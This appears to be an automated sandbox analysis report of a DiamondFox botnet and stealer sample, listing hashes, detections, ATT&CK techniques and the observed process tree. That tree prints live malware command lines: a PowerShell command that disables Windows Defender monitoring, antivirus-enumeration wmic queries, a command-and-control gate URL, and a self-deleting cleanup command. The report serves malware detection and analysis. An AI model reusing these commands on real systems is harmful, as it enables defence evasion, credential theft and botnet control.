diamondfox | 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215

Analysis

max time kernel
133s
max time network
164s
platform
windows7_x64
resource
win7v20210410
submitted
04-07-2021 12:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe
Size

203KB
MD5

a1e165e1926c0c83123c89fce6b1af56
SHA1

281246ba4b852a5f62e032424f7816f5a6b0406f
SHA256

2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA512

28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354

Score

10^/10

diamondfox botnet discovery spyware stealer

Malware Config

Signatures

DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
botnet stealer diamondfox

DiamondFox payload 18 IoCs

Detects DiamondFox payload in file/memory.

Processes:

resource	yara_rule
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox
\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe	diamondfox

NirSoft MailPassView 3 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral1/memory/976-151-0x0000000000400000-0x0000000000455000-memory.dmp	MailPassView
behavioral1/memory/976-152-0x000000000044412E-mapping.dmp	MailPassView
behavioral1/memory/976-155-0x0000000000400000-0x0000000000455000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 3 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral1/memory/836-134-0x0000000000400000-0x000000000047C000-memory.dmp	WebBrowserPassView
behavioral1/memory/836-135-0x00000000004466F4-mapping.dmp	WebBrowserPassView
behavioral1/memory/836-138-0x0000000000400000-0x000000000047C000-memory.dmp	WebBrowserPassView

Nirsoft 8 IoCs

Processes:

resource	yara_rule
behavioral1/memory/836-134-0x0000000000400000-0x000000000047C000-memory.dmp	Nirsoft
behavioral1/memory/836-135-0x00000000004466F4-mapping.dmp	Nirsoft
behavioral1/memory/836-138-0x0000000000400000-0x000000000047C000-memory.dmp	Nirsoft
behavioral1/memory/1596-146-0x0000000000400000-0x0000000000422000-memory.dmp	Nirsoft
behavioral1/memory/1596-150-0x0000000000400000-0x0000000000422000-memory.dmp	Nirsoft
behavioral1/memory/976-151-0x0000000000400000-0x0000000000455000-memory.dmp	Nirsoft
behavioral1/memory/976-152-0x000000000044412E-mapping.dmp	Nirsoft
behavioral1/memory/976-155-0x0000000000400000-0x0000000000455000-memory.dmp	Nirsoft

Executes dropped EXE 10 IoCs

Processes:

MicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exe

pid	process
316	MicrosoftEdgeCPS.exe
836	MicrosoftEdgeCPS.exe
2032	MicrosoftEdgeCPS.exe
1596	MicrosoftEdgeCPS.exe
976	MicrosoftEdgeCPS.exe
956	MicrosoftEdgeCPS.exe
540	MicrosoftEdgeCPS.exe
1776	MicrosoftEdgeCPS.exe
1500	MicrosoftEdgeCPS.exe
1148	MicrosoftEdgeCPS.exe

Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

1660 powershell.exe

Loads dropped DLL 7 IoCs

Processes:

2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exeMicrosoftEdgeCPS.exeWerFault.exe

pid	process
1036	2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe
1036	2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe
316	MicrosoftEdgeCPS.exe
548	WerFault.exe
548	WerFault.exe
548	WerFault.exe
548	WerFault.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 9 IoCs

Processes:

MicrosoftEdgeCPS.exe

description	pid	process	target process
PID 316 set thread context of 836	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 set thread context of 2032	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 set thread context of 1596	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 set thread context of 976	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 set thread context of 956	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 set thread context of 540	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 set thread context of 1776	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 set thread context of 1500	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 set thread context of 1148	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

548 1148 WerFault.exe MicrosoftEdgeCPS.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

1636 notepad.exe

pid	pid_target	process	target process
548	1148	WerFault.exe	MicrosoftEdgeCPS.exe

pid	process
1636	notepad.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

powershell.exepowershell.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeWerFault.exe

pid	process
1660	powershell.exe
1612	powershell.exe
1660	powershell.exe
1612	powershell.exe
316	MicrosoftEdgeCPS.exe
836	MicrosoftEdgeCPS.exe
836	MicrosoftEdgeCPS.exe
1148	MicrosoftEdgeCPS.exe
316	MicrosoftEdgeCPS.exe
548	WerFault.exe
548	WerFault.exe
548	WerFault.exe
548	WerFault.exe
548	WerFault.exe
316	MicrosoftEdgeCPS.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exewmic.exewmic.exe

description	pid	process
Token: SeDebugPrivilege	1660	powershell.exe
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeIncreaseQuotaPrivilege	288	wmic.exe
Token: SeSecurityPrivilege	288	wmic.exe
Token: SeTakeOwnershipPrivilege	288	wmic.exe
Token: SeLoadDriverPrivilege	288	wmic.exe
Token: SeSystemProfilePrivilege	288	wmic.exe
Token: SeSystemtimePrivilege	288	wmic.exe
Token: SeProfSingleProcessPrivilege	288	wmic.exe
Token: SeIncBasePriorityPrivilege	288	wmic.exe
Token: SeCreatePagefilePrivilege	288	wmic.exe
Token: SeBackupPrivilege	288	wmic.exe
Token: SeRestorePrivilege	288	wmic.exe
Token: SeShutdownPrivilege	288	wmic.exe
Token: SeDebugPrivilege	288	wmic.exe
Token: SeSystemEnvironmentPrivilege	288	wmic.exe
Token: SeRemoteShutdownPrivilege	288	wmic.exe
Token: SeUndockPrivilege	288	wmic.exe
Token: SeManageVolumePrivilege	288	wmic.exe
Token: 33	288	wmic.exe
Token: 34	288	wmic.exe
Token: 35	288	wmic.exe
Token: SeIncreaseQuotaPrivilege	288	wmic.exe
Token: SeSecurityPrivilege	288	wmic.exe
Token: SeTakeOwnershipPrivilege	288	wmic.exe
Token: SeLoadDriverPrivilege	288	wmic.exe
Token: SeSystemProfilePrivilege	288	wmic.exe
Token: SeSystemtimePrivilege	288	wmic.exe
Token: SeProfSingleProcessPrivilege	288	wmic.exe
Token: SeIncBasePriorityPrivilege	288	wmic.exe
Token: SeCreatePagefilePrivilege	288	wmic.exe
Token: SeBackupPrivilege	288	wmic.exe
Token: SeRestorePrivilege	288	wmic.exe
Token: SeShutdownPrivilege	288	wmic.exe
Token: SeDebugPrivilege	288	wmic.exe
Token: SeSystemEnvironmentPrivilege	288	wmic.exe
Token: SeRemoteShutdownPrivilege	288	wmic.exe
Token: SeUndockPrivilege	288	wmic.exe
Token: SeManageVolumePrivilege	288	wmic.exe
Token: 33	288	wmic.exe
Token: 34	288	wmic.exe
Token: 35	288	wmic.exe
Token: SeIncreaseQuotaPrivilege	1336	wmic.exe
Token: SeSecurityPrivilege	1336	wmic.exe
Token: SeTakeOwnershipPrivilege	1336	wmic.exe
Token: SeLoadDriverPrivilege	1336	wmic.exe
Token: SeSystemProfilePrivilege	1336	wmic.exe
Token: SeSystemtimePrivilege	1336	wmic.exe
Token: SeProfSingleProcessPrivilege	1336	wmic.exe
Token: SeIncBasePriorityPrivilege	1336	wmic.exe
Token: SeCreatePagefilePrivilege	1336	wmic.exe
Token: SeBackupPrivilege	1336	wmic.exe
Token: SeRestorePrivilege	1336	wmic.exe
Token: SeShutdownPrivilege	1336	wmic.exe
Token: SeDebugPrivilege	1336	wmic.exe
Token: SeSystemEnvironmentPrivilege	1336	wmic.exe
Token: SeRemoteShutdownPrivilege	1336	wmic.exe
Token: SeUndockPrivilege	1336	wmic.exe
Token: SeManageVolumePrivilege	1336	wmic.exe
Token: 33	1336	wmic.exe
Token: 34	1336	wmic.exe
Token: 35	1336	wmic.exe
Token: SeIncreaseQuotaPrivilege	1336	wmic.exe
Token: SeSecurityPrivilege	1336	wmic.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

MicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exe

pid process

2032 MicrosoftEdgeCPS.exe
540 MicrosoftEdgeCPS.exe
1776 MicrosoftEdgeCPS.exe

pid	process
2032	MicrosoftEdgeCPS.exe
540	MicrosoftEdgeCPS.exe
1776	MicrosoftEdgeCPS.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exeMicrosoftEdgeCPS.exe

description	pid	process	target process
PID 1036 wrote to memory of 316	1036	2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe	MicrosoftEdgeCPS.exe
PID 1036 wrote to memory of 316	1036	2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe	MicrosoftEdgeCPS.exe
PID 1036 wrote to memory of 316	1036	2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe	MicrosoftEdgeCPS.exe
PID 1036 wrote to memory of 316	1036	2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe	MicrosoftEdgeCPS.exe
PID 1036 wrote to memory of 1660	1036	2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe	powershell.exe
PID 1036 wrote to memory of 1660	1036	2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe	powershell.exe
PID 1036 wrote to memory of 1660	1036	2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe	powershell.exe
PID 1036 wrote to memory of 1660	1036	2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe	powershell.exe
PID 316 wrote to memory of 1612	316	MicrosoftEdgeCPS.exe	powershell.exe
PID 316 wrote to memory of 1612	316	MicrosoftEdgeCPS.exe	powershell.exe
PID 316 wrote to memory of 1612	316	MicrosoftEdgeCPS.exe	powershell.exe
PID 316 wrote to memory of 1612	316	MicrosoftEdgeCPS.exe	powershell.exe
PID 316 wrote to memory of 288	316	MicrosoftEdgeCPS.exe	wmic.exe
PID 316 wrote to memory of 288	316	MicrosoftEdgeCPS.exe	wmic.exe
PID 316 wrote to memory of 288	316	MicrosoftEdgeCPS.exe	wmic.exe
PID 316 wrote to memory of 288	316	MicrosoftEdgeCPS.exe	wmic.exe
PID 316 wrote to memory of 1336	316	MicrosoftEdgeCPS.exe	wmic.exe
PID 316 wrote to memory of 1336	316	MicrosoftEdgeCPS.exe	wmic.exe
PID 316 wrote to memory of 1336	316	MicrosoftEdgeCPS.exe	wmic.exe
PID 316 wrote to memory of 1336	316	MicrosoftEdgeCPS.exe	wmic.exe
PID 316 wrote to memory of 756	316	MicrosoftEdgeCPS.exe	wmic.exe
PID 316 wrote to memory of 756	316	MicrosoftEdgeCPS.exe	wmic.exe
PID 316 wrote to memory of 756	316	MicrosoftEdgeCPS.exe	wmic.exe
PID 316 wrote to memory of 756	316	MicrosoftEdgeCPS.exe	wmic.exe
PID 316 wrote to memory of 1348	316	MicrosoftEdgeCPS.exe	wmic.exe
PID 316 wrote to memory of 1348	316	MicrosoftEdgeCPS.exe	wmic.exe
PID 316 wrote to memory of 1348	316	MicrosoftEdgeCPS.exe	wmic.exe
PID 316 wrote to memory of 1348	316	MicrosoftEdgeCPS.exe	wmic.exe
PID 316 wrote to memory of 332	316	MicrosoftEdgeCPS.exe	wmic.exe
PID 316 wrote to memory of 332	316	MicrosoftEdgeCPS.exe	wmic.exe
PID 316 wrote to memory of 332	316	MicrosoftEdgeCPS.exe	wmic.exe
PID 316 wrote to memory of 332	316	MicrosoftEdgeCPS.exe	wmic.exe
PID 316 wrote to memory of 960	316	MicrosoftEdgeCPS.exe	wmic.exe
PID 316 wrote to memory of 960	316	MicrosoftEdgeCPS.exe	wmic.exe
PID 316 wrote to memory of 960	316	MicrosoftEdgeCPS.exe	wmic.exe
PID 316 wrote to memory of 960	316	MicrosoftEdgeCPS.exe	wmic.exe
PID 316 wrote to memory of 1812	316	MicrosoftEdgeCPS.exe	wmic.exe
PID 316 wrote to memory of 1812	316	MicrosoftEdgeCPS.exe	wmic.exe
PID 316 wrote to memory of 1812	316	MicrosoftEdgeCPS.exe	wmic.exe
PID 316 wrote to memory of 1812	316	MicrosoftEdgeCPS.exe	wmic.exe
PID 316 wrote to memory of 836	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 wrote to memory of 836	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 wrote to memory of 836	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 wrote to memory of 836	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 wrote to memory of 836	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 wrote to memory of 836	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 wrote to memory of 836	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 wrote to memory of 836	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 wrote to memory of 836	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 wrote to memory of 836	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 wrote to memory of 2032	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 wrote to memory of 2032	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 wrote to memory of 2032	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 wrote to memory of 2032	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 wrote to memory of 2032	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 wrote to memory of 2032	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 wrote to memory of 2032	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 wrote to memory of 2032	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 wrote to memory of 1596	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 wrote to memory of 1596	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 wrote to memory of 1596	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 wrote to memory of 1596	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 wrote to memory of 1596	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe
PID 316 wrote to memory of 1596	316	MicrosoftEdgeCPS.exe	MicrosoftEdgeCPS.exe

C:\Users\Admin\AppData\Local\Temp\2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe
"C:\Users\Admin\AppData\Local\Temp\2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1036

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
"C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:316

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 1
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1612

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:288

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" os get caption /FORMAT:List
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1336

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_VideoController get caption /FORMAT:List
3⤵
PID:756

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List
3⤵
PID:1348

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List
3⤵
PID:332

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
3⤵
PID:960

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
3⤵
PID:1812

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
/scomma "C:\Users\Admin\AppData\Local\Temp\1.log"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:836

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
/scomma "C:\Users\Admin\AppData\Local\Temp\4.log"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2032

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
/scomma "C:\Users\Admin\AppData\Local\Temp\2.log"
3⤵
- Executes dropped EXE
PID:1596

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
/scomma "C:\Users\Admin\AppData\Local\Temp\3.log"
3⤵
- Executes dropped EXE
PID:976

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
3⤵
- Executes dropped EXE
PID:956

C:\Windows\notepad.exe
X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
4⤵
- Opens file in notepad (likely ransom note)
PID:1636

C:\Windows\write.exe
X C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
4⤵
PID:1516

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:540

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1776

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
3⤵
- Executes dropped EXE
PID:1500

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
X http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d8
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1148

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1148 -s 276
4⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:548

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
3⤵
PID:844

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
3⤵
PID:1832

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List
3⤵
PID:1060

C:\Windows\SysWOW64\Wbem\wmic.exe
"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List
3⤵
PID:804

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe' -Force -Recurse
2⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1660

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1602f747-c1a3-4345-8dec-4dcb8b1f72e5
MD5
02ff38ac870de39782aeee04d7b48231

SHA1
0390d39fa216c9b0ecdb38238304e518fb2b5095

SHA256
fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

SHA512
24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2d686436-375c-4ee1-bd4a-9e44ccd248ba
MD5
75a8da7754349b38d64c87c938545b1b

SHA1
5c28c257d51f1c1587e29164cc03ea880c21b417

SHA256
bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

SHA512
798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4375eeb7-a65d-43f1-a616-02c5ad6c5370
MD5
be4d72095faf84233ac17b94744f7084

SHA1
cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

SHA256
b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

SHA512
43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6fe5bd95-2cea-4aea-9c8c-dd67bac4295b
MD5
df44874327d79bd75e4264cb8dc01811

SHA1
1396b06debed65ea93c24998d244edebd3c0209d

SHA256
55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

SHA512
95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bc2fe8ee-69c0-48ce-8821-1fab80ab4eeb
MD5
597009ea0430a463753e0f5b1d1a249e

SHA1
4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

SHA256
3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

SHA512
5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fa12b0a1-3d6a-4bab-a74a-253a75ca0598
MD5
5e3c7184a75d42dda1a83606a45001d8

SHA1
94ca15637721d88f30eb4b6220b805c5be0360ed

SHA256
8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

SHA512
fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fd9bf4da-ec38-4847-85c5-d50f35796d4c
MD5
a725bb9fafcf91f3c6b7861a2bde6db2

SHA1
8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

SHA256
51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

SHA512
1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fe80cd26-0cf7-4e38-9884-6dab53b04ca9
MD5
b6d38f250ccc9003dd70efd3b778117f

SHA1
d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

SHA256
4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

SHA512
67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
f62bbfed41c59f5b42018522a3fecba9

SHA1
3fdfb455d148133e7bb440c7f5ceb033226942c6

SHA256
